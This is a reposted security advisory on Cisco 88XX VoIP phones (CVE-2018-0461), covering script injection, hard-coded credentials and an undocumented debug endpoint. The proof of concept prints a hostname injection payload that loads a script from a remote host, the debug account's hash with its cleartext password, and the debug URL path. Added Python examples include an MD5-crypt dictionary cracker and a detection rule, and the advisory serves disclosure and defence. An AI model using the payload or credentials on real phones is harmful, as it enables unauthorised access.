Cisco VoIP Script Insertion / Weak Passwords / Undocumented Functionality
Posted Jan 10, 2019
Authored by W. Schober | Site sec-consult.com

Cisco VoIP phones such as the 88XX models suffer from script insertion, weak and hard-coded passwords, undocumented debug functionality, and various outdated components with known vulnerabilities.

tags | exploit, vulnerability
systems | cisco
advisories | CVE-2018-0461
SHA-256 | 41a1b9784b878fa08044f5ed9bf633aed22e9a1c597ac51d8518b8c652c3cb84

SEC Consult Vulnerability Lab Security Advisory < 20190109-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Cisco VoIP Phones, e.g. models 88XX
vulnerable version: See list of vulnerable devices/firmwares below
fixed version: 12.5.1 MN
CVE number: CVE-2018-0461
impact: high
homepage: https://www.cisco.com
found: 10/2018
by: W. Schober, IoT Inspector (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes
seeking secure, high-quality, full-featured VoIP. Select models provide
affordable entry to HD video and support for highly-active, in-campus mobile
workers."

Source:
https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html


Business recommendation:
------------------------
SEC Consult recommends updating the devices to the newest firmware (12.5.1 MN),
in which, according to the vendor, all documented issues are fixed.

We want to thank Cisco for the very professional response and great coordination.


Vulnerability overview/description:
-----------------------------------
1) Arbitrary Script Injection
The VoIP phones can be managed directly via the integrated keypad and the
built-in screen. Several fields in the configuration menu (e.g. Hostname)
accept free text typed on the keypad. The values entered there are rendered
into the phone UI without sanitization, so these fields are vulnerable to
JavaScript injection: an attacker with access to the T9 keypad can inject
arbitrary payloads.


2) Hard-coded and weak secrets
(Identified during an automated firmware analysis by IoT Inspector)
The firmware, as served directly by Cisco, contains multiple hard-coded
password hashes. They are stored in /etc/passwd and use outdated hashing
algorithms (salted UNIX MD5-crypt and DES-crypt). The corresponding users are
not documented anywhere. SSH access with these credentials is possible.

Because of the outdated algorithm (UNIX MD5-crypt) and the very weak password,
the debug user's password could be brute-forced within seconds.


3) Undocumented debug functionality
During a manual firmware analysis, several undocumented endpoints were
identified in the built-in web application running on the VoIP phone. These
routes lead to parts of the web application that are neither documented nor
officially mentioned anywhere by Cisco, and they allow an attacker to debug
the device and create memory dumps.


4) Various outdated components with known vulnerabilities
During the analysis, many outdated components were identified by their version
numbers. It is not known which patches the vendor has backported, but Cisco
stated that some have been implemented. The potentially affected components
are:

-) wpa_supplicant
-) BusyBox
-) Dnsmasq
-) OpenSSL
-) OpenSSH
-) Linux Kernel Privilege Escalation "app_key"
-) Linux Kernel Privilege Escalation "Mempodipper"
-) Multiple Linux Kernel CVE entries

Please take a look at the IoT Inspector report for details:
https://r.sec-consult.com/iotinspectorcisco


Proof of concept:
-----------------
1) Arbitrary Script Injection
Many settings can be changed directly on the VoIP phone via the built-in
screen, and at several places the user input is parsed and displayed. It was
possible to inject arbitrary (JavaScript) code directly into the phone UI. As
an example, the hostname of the VoIP phone can be set to the following value:

hostname"><img src=http://$IP/sec.js onload=exec()>

The quote and closing bracket at the start terminate the attribute value into
which the hostname is written, so the rest of the string is parsed as a new
img element. sec.js is loaded from the remote host immediately and the exec
function is executed.

< A screenshot can be found online on our website >

Further analysis has not been performed, but depending on the underlying
libraries/system in use, it might be possible to get system level access via
this attack vector.
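The two halves of this bug are the missing output encoding and the missing input validation. The following added example (written for this page, not Cisco's code or the advisory's) models a UI that splices the configured hostname straight into markup, next to the same rendering with attribute escaping and an RFC 1123 hostname allow-list. The attacker host 192.0.2.10 stands in for $IP and the markup template is an assumption about how such a UI is built.

```python
import html
import re

# The advisory's payload, with an assumed attacker host in place of $IP.
ADVISORY_PAYLOAD = 'hostname"><img src=http://192.0.2.10/sec.js onload=exec()>'

# RFC 1123 label: letters, digits, hyphens; 1-63 chars; no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def render_hostname_unsafe(hostname: str) -> str:
    """Assumed model of the vulnerable behaviour: the stored value is
    concatenated into an attribute with no encoding at all."""
    return f'<input name="hostname" value="{hostname}">'


def render_hostname_safe(hostname: str) -> str:
    """Same markup, but the value is encoded as attribute text, so a double
    quote in the input can no longer close the attribute or open a tag."""
    return f'<input name="hostname" value="{html.escape(hostname, quote=True)}">'


def is_valid_hostname(hostname: str) -> bool:
    """Allow-list check applied before the value is stored at all; escaping
    stops markup injection, validation keeps junk out of the configuration."""
    if not hostname or len(hostname) > 253:
        return False
    return all(_LABEL.match(label) for label in hostname.split("."))


def injected_tags(markup: str) -> list:
    """Audit helper: every tag name in the output other than the intended input."""
    return [t for t in re.findall(r"<(\w+)", markup) if t.lower() != "input"]


if __name__ == "__main__":
    for renderer in (render_hostname_unsafe, render_hostname_safe):
        out = renderer(ADVISORY_PAYLOAD)
        print(f"{renderer.__name__}: injected tags = {injected_tags(out)}")
        print("  ", out)
    print("payload valid hostname?", is_valid_hostname(ADVISORY_PAYLOAD))
    print("sep-8841-lobby valid?  ", is_valid_hostname("sep-8841-lobby"))
```

Running it shows the unsafe renderer emitting a second element (img) while the safe one emits only the input, and the validator rejecting the payload outright. Both measures belong together: the allow-list alone would not protect other free-text fields the advisory mentions, and escaping alone still stores an obviously hostile hostname.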


2) Hard coded and weak secrets
The file at the following path contains a hard-coded password hash for the user debug:
/_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd

$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix))

This hash corresponds to the following clear-text password: debug

The password hash for the users root and default is also stored in /etc/passwd:
nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default
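A firmware audit for this class of finding needs three things: parse the extracted /etc/passwd, classify each password field by hash format, and confirm that the MD5-crypt entries fall to a small dictionary. The added example below (not part of the advisory, not Cisco code) does that with a self-contained MD5-crypt ($1$) implementation following the FreeBSD/glibc algorithm, so it runs without the deprecated crypt module. The sample passwd content and the wordlist are constructed; only the two hash values are taken from the advisory, and the uid/gid/home/shell fields next to them are assumptions.

```python
import hashlib
from typing import List, Optional, Tuple

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed sample in the layout of an extracted /etc/passwd. The debug line
# carries the MD5-crypt hash quoted in the advisory, the root/default lines the
# 13-character DES-crypt hash it lists; uid/gid/home/shell fields are assumed.
SAMPLE_PASSWD = """\
root:nCjlgBm7.lvX2:0:0:root:/root:/bin/sh
default:nCjlgBm7.lvX2:1000:1000::/home/default:/bin/sh
debug:$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71:0:0::/:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/false
"""

# Constructed wordlist; a real audit uses a full dictionary plus mangling rules.
WORDLIST = ["admin", "cisco", "root", "default", "debug", "password"]


def _to64(v: int, n: int) -> str:
    """crypt(3)-style base64: 6 bits per character, least significant first."""
    out = ""
    for _ in range(n):
        out += ITOA64[v & 0x3F]
        v >>= 6
    return out


def md5crypt(password: bytes, salt: str) -> str:
    """MD5-crypt ($1$) as implemented in FreeBSD/glibc: 1000 MD5 rounds and no
    memory cost, so one GPU tests tens of millions of guesses per second."""
    salt_b = salt[:8].encode()
    ctx = hashlib.md5(password + b"$1$" + salt_b)
    alt = hashlib.md5(password + salt_b + password).digest()
    for n in range(len(password), 0, -16):
        ctx.update(alt[: min(16, n)])
    n = len(password)
    while n:  # the "something really weird" step of the reference code
        ctx.update(b"\0" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):
        rnd = hashlib.md5(password if i & 1 else final)
        if i % 3:
            rnd.update(salt_b)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in groups)
    return "$1$" + salt_b.decode() + "$" + enc + _to64(final[11], 2)


def hash_type(field: str) -> str:
    """Classify a passwd password field; unrecognised formats are reported."""
    if field == "":
        return "empty"          # login without any password
    if field in ("*", "!"):
        return "locked"
    if field == "x":
        return "shadow"         # real hash lives in /etc/shadow
    if field.startswith("$1$"):
        return "md5crypt"
    if len(field) == 13 and "$" not in field:
        return "descrypt"       # traditional DES crypt: 56-bit key, 8-char limit
    return "unknown"


def parse_passwd(text: str) -> List[Tuple[str, str, str]]:
    """Return (user, password_field, type) for every entry in the file."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, field = line.split(":", 2)[:2]
        entries.append((user, field, hash_type(field)))
    return entries


def crack_md5crypt(hash_str: str, wordlist: List[str]) -> Optional[str]:
    """Dictionary check: one md5crypt() per candidate against the stored hash."""
    salt = hash_str.split("$", 3)[2]
    for word in wordlist:
        if md5crypt(word.encode(), salt) == hash_str:
            return word
    return None


def audit(text: str, wordlist: List[str]) -> List[Tuple[str, str, Optional[str]]]:
    """Report every account whose field is empty or holds a hash, with the
    dictionary hit for MD5-crypt entries; DES-crypt entries are only flagged."""
    findings = []
    for user, field, kind in parse_passwd(text):
        if kind in ("locked", "shadow"):
            continue
        hit = crack_md5crypt(field, wordlist) if kind == "md5crypt" else None
        findings.append((user, kind, hit))
    return findings


if __name__ == "__main__":
    for user, kind, hit in audit(SAMPLE_PASSWD, WORDLIST):
        print(f"{user:8} {kind:9} {'cracked: ' + hit if hit else 'not in wordlist'}")
```

Run against the sample, the debug account falls on the fifth guess, and root/default are reported as DES-crypt, which is worth a finding on its own: DES-crypt truncates passwords to eight characters and is exhaustively searchable regardless of what was chosen. Point the same script at the squashfs-root/etc/passwd of any extracted image to get the same triage.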


3) Undocumented debug functionality
The built-in VoIP phone web server offers multiple functions for the
end user. During a manual analysis, undocumented endpoints with critical
functionality were identified. They can be reached by visiting the following
endpoint:

https://$VOIP-Phone-IP/CGI/Java/Monitor

Offered functionality includes:
-) Memory Info
-) Garbage Collection
-) Thread Info
-) Registration Info
-) Properties
-) Monitor Menu
-) Lock Menu

< A screenshot can be found online on our website >
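Until the firmware is updated, the practical defence is to notice anyone using this endpoint and to enforce the segmentation workaround. The added example below (mine, not from the advisory or Cisco) runs two detection rules over web-access records: one flags any request whose path begins with the undocumented /CGI/Java/Monitor endpoint, the other flags web traffic to a phone from outside the VoIP segment. The log layout, the 10.20.0.0/16 phone segment, the sample lines and the assumption that the menu items hang off the Monitor path are all constructed for the example.

```python
import ipaddress
import re
from typing import List, Tuple

# Assumed addressing: the phones sit in the 10.20.0.0/16 VoIP segment and serve
# their web UI on 80/443. Adjust to the real VLAN layout.
VOIP_SEGMENT = ipaddress.ip_network("10.20.0.0/16")
PHONE_WEB_PORTS = {80, 443}

# Undocumented endpoint from the advisory; matching on the prefix is an
# assumption that its menu items (Memory Info, Thread Info, ...) live below it.
DEBUG_PATH_PREFIX = "/CGI/Java/Monitor"

# Constructed sample lines in an assumed proxy/flow log layout:
# "<src_ip> <dst_ip>:<port> <method> <path> <status>"
SAMPLE_LOG = """\
10.20.4.17 10.20.4.18:443 GET / 200
10.50.1.9 10.20.4.18:443 GET /CGI/Java/Monitor 200
10.20.4.21 10.20.4.18:80 GET /CGI/Java/Monitor 200
10.50.1.9 10.20.4.18:443 GET / 200
garbage line that does not parse
"""

LINE_RE = re.compile(r"^(\S+) (\S+):(\d+) (\S+) (\S+) (\d{3})$")


def classify(line: str) -> Tuple[str, str, str, List[str]]:
    """Return (src, dst, path, alerts) for one record; raises ValueError when
    the line does not match the layout or carries an invalid address."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unparsable line: {line!r}")
    src, dst, port, _method, path, _status = m.groups()
    src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    alerts = []
    # Rule 1: anyone touching the undocumented debug/monitor endpoint,
    # including another host inside the VoIP segment.
    if path.startswith(DEBUG_PATH_PREFIX):
        alerts.append("debug-endpoint")
    # Rule 2: web access to a phone from outside the segment, which the
    # advisory's segmentation workaround says must never be possible.
    if (dst_ip in VOIP_SEGMENT and int(port) in PHONE_WEB_PORTS
            and src_ip not in VOIP_SEGMENT):
        alerts.append("cross-segment-web")
    return src, dst, path, alerts


def scan(log_text: str) -> Tuple[List[Tuple[str, str, str, List[str]]], int]:
    """Run both rules over a log; returns (flagged events, unparsable lines)."""
    flagged, bad = [], 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            event = classify(line)
        except ValueError:
            bad += 1
            continue
        if event[3]:
            flagged.append(event)
    return flagged, bad


if __name__ == "__main__":
    events, unparsed = scan(SAMPLE_LOG)
    for src, dst, path, alerts in events:
        print(f"{src:>12} -> {dst:<12} {path:<20} {', '.join(alerts)}")
    print(f"{unparsed} unparsable line(s)")
```

The unparsable line is counted rather than silently dropped, since a detection that quietly skips records it cannot read is one an attacker can hide behind. The second rule is the one to keep after the firmware is fixed: any web access to a phone from outside its segment is a policy violation regardless of which endpoint is requested.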

4) Various outdated components with known vulnerabilities
No PoC available


Vulnerable / tested versions:
-----------------------------
The following firmware/device has been tested with IoT Inspector and manually:
* Cisco IP Phone 88xx: Firmware version 12-0-1 ES-15 (ID: f86aa7612d9311e6)

The following devices are also vulnerable according to the vendor:
* IP Conference Phone 8832
* IP Phone 8811
* IP Phone 8841
* IP Phone 8845
* IP Phone 8851
* IP Phone 8861
* IP Phone 8865
* Unified IP Conference Phone 8831
* Wireless IP Phone 8821
* Wireless IP Phone 8821-EX


Vendor contact timeline:
------------------------
2018-10-17: Contacting Cisco PSIRT through psirt@cisco.com
2018-10-17: Initial response from Cisco PSIRT. Assigned ID: PSIRT-0289060835
Cisco PSIRT requests that the public disclosure be shifted to
January 2019 to avoid the Christmas holidays.
2018-10-18: Contacting Cisco PSIRT and agreeing on public disclosure date
2019-01-09.
2018-10-24: Update from Cisco that a case owner got assigned.
2018-10-29: Update from Cisco that they are still reviewing the vulnerabilities
and that they have already requested CVEs.
2018-11-05: Update from Cisco with further details about the internal scheduling.
2018-11-12: Update from Cisco with further details about CVEs.
2018-11-12: Cisco assigned CVE-2018-0461 and informed us that the vulnerabilities
will be fixed in an upcoming release at the end of the year;
Requesting affected/fixed versions.
2018-11-30: Cisco responds with affected devices and firmwares. SEC Consult
requests the updated firmware in order to verify the fixes with
another IoT Inspector scan.
2019-01-09: Public release of security advisory


Solution:
---------
Update the firmware of the affected devices to at least 12.5.1 MN.

The vendor has published a security advisory as well:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-phone-script-injection


Workaround:
-----------
-) Disable the built-in web server
-) Segment the VoIP network so that devices other than VoIP phones can
   neither reach it nor be reached from it
-) Remove the debug user


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Schober / @2019
